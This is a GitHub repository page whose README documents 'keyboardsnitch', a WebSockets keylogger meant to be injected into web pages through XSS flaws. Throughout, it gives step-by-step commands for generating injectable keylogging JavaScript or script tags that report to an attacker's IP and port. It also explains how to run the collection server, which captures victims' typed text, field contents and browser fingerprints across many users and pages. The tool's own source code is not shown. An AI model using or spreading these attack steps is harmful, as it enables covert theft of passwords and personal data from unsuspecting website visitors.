No description, website, or topics provided.
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
wskeyloggerd
README.md
config.py
pip.req
run.py

README.md

#keyboardsnitch

An easy to use WebSockets keylogger for injecting into pages vulnerable to XSS. Fast, reliable, and deadly accurate.

#Key Features

  • Easily generate keylogging Javascript code to inject into web apps vulnerable to XSS
  • Easily generate script tags linking to keylogging Javascript code to inject into web apps vulnerable to XSS. Easily host keylogger without additional middleware such as nginx or apache.
  • Smart realtime keylogging shows you exactly where the user is typing at any given moment
  • Smart realtime keylogging shows you the exact contents of every text field that the user is viewing at any given moment
  • Fully grepable output
  • Able to distinguish between keystrokes coming from multiple users and web apps
  • Capable of fingerprinting users' browsers
  • Interactive Mode included

#Setup

Dependencies can be installed by running:

pip install -r pip.req

#Usage Instructions

##Step 1 - Inject link to WebSockets source into target page

Run keyboardsnitch with the --ws-source flag to generate a link to the WebSockets source code.

python keyboardsnitch.py --ws-source

Copy the script tag into your clipboard and inject into the vulnerable web page. Depending on the nature of the XSS vulnerability you are exploiting, you may have to modify this script tag.

##Step 2 - Inject keylogger into target page

keyboardsnitch provides two methods of injecting its keylogging JavaScript code. You can choose to inject the keylogging JavaScript code directly into the target page, or you can inject a script tag that links to the JavaScript code hosted externally.

###Option 1 - Inject Raw Source Code

To generate a keylogger that can be injected directly into the target page, use the following command:

# substitute YOUR_IP with your ip address
# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
python keyboardsnitch.py --inject-code --lhost YOUR_IP --lport LISTEN_PORT

keyboardsnitch will automatically modify the keylogger's source code to include your ip/domain and port number.

Example:

python keyboardsnitch.py --inject-code --lhost 123.123.123.1 --lport 80

###Option 2 - Inject Script Tag

Should you want to inject a script tag instead of raw source code, keyboardsnitch makes it easy to do that too. keyboardsnitch can serve the keylogger as a JavaScript file without any additional configuration.

To generate a script tag linking to the keylogger, use the following command:

# substitute YOUR_IP with your ip address
# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
python keyboardsnitch.py --inject-tag --lhost YOUR_IP --lport LISTEN_PORT

As with the WebSockets script tag, the generated script tag may require additional configuration or modification.

Example:

python keyboardsnitch.py --inject-tag --lhost 123.123.123.1 --lport 80

##Step 3 - Run Server and Log Keystrokes

Once the keylogger has been injected into the target web page, we start keyboardsnitch's server component to start logging keystrokes.

# substitute YOUR_IP with your ip address
# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
python keyboardsnitch.py --lhost YOUR_IP --lport LISTEN_PORT

When a user begins typing into a text field on the target web page, the contents of that text field will be shown in real time. Additionally, information about the text field is displayed so that you can identify what is being typed where.

###Addtional Display Options - Quick Reference

If you are targeting a page visited by multiple users, use this command:

# substitute YOUR_IP with your ip address
# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
python keyboardsnitch.py --clients --lhost YOUR_IP --lport LISTEN_PORT

If you are injecting the keylogger into multiple pages, use this command:

# substitute YOUR_IP with your ip address
# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
python keyboardsnitch.py --hosts --lhost YOUR_IP --lport LISTEN_PORT

If you are injecting the keylogger into multiple pages and expect those pages to be visited by multiple users, use this command:

# substitute YOUR_IP with your ip address
# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
python keyboardsnitch.py --clients --hosts --lhost YOUR_IP --lport LISTEN_PORT

If you want information about users' web browsers, use the --user-agents flag along with whatever other flags you choose to include:

# substitute YOUR_IP with your ip address
# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
python keyboardsnitch.py --user-agents --lhost YOUR_IP --lport LISTEN_PORT

#Interactive Mode

You can also run keyboardsnitch in Interactive Mode by using the --wizard flag:

python keyboardsnitch.py --wizard

Interactive Mode will walk you through steps 1, 2, 3 shown above.